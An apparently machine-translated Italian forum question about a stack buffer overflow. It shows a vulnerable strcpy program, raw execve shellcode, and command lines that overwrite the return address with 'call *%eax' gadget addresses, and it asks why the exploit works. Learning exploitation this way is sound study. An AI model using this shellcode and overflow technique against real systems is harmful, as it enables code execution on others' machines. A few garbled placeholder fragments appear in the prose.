Dato questo programma C:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Costruito con:
gcc -m32 -z execstack prog.c -o prog
Dato codice shell:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
Il programma è sfruttabile con i comandi:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
dove ho preso gli indirizzi da:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
Capisco il significato dei% pad_de% paddings nel mezzo, ho calcolato il 991 in base alla lunghezza di AAAA
nel programma e alla lunghezza di buf
.
Quello che non capisco è perché nessuno di questi indirizzi con $EGG
attiva l'esecuzione dello shellcode copiato all'inizio di call *%eax
. Per quanto ho capito, sto sovrascrivendo l'indirizzo di ritorno con buf
(o l'altro), quello che non capisco è perché questo porta a saltare allo shellcode.
Ho ottenuto questo risultato leggendo Smashing the stack per divertimento e profitto . Ma l'articolo usa un approccio diverso per indovinare un indirizzo relativo per passare allo shellcode. Sono perplesso dal motivo per cui questa soluzione alternativa più semplice funziona, dritta senza intuizioni.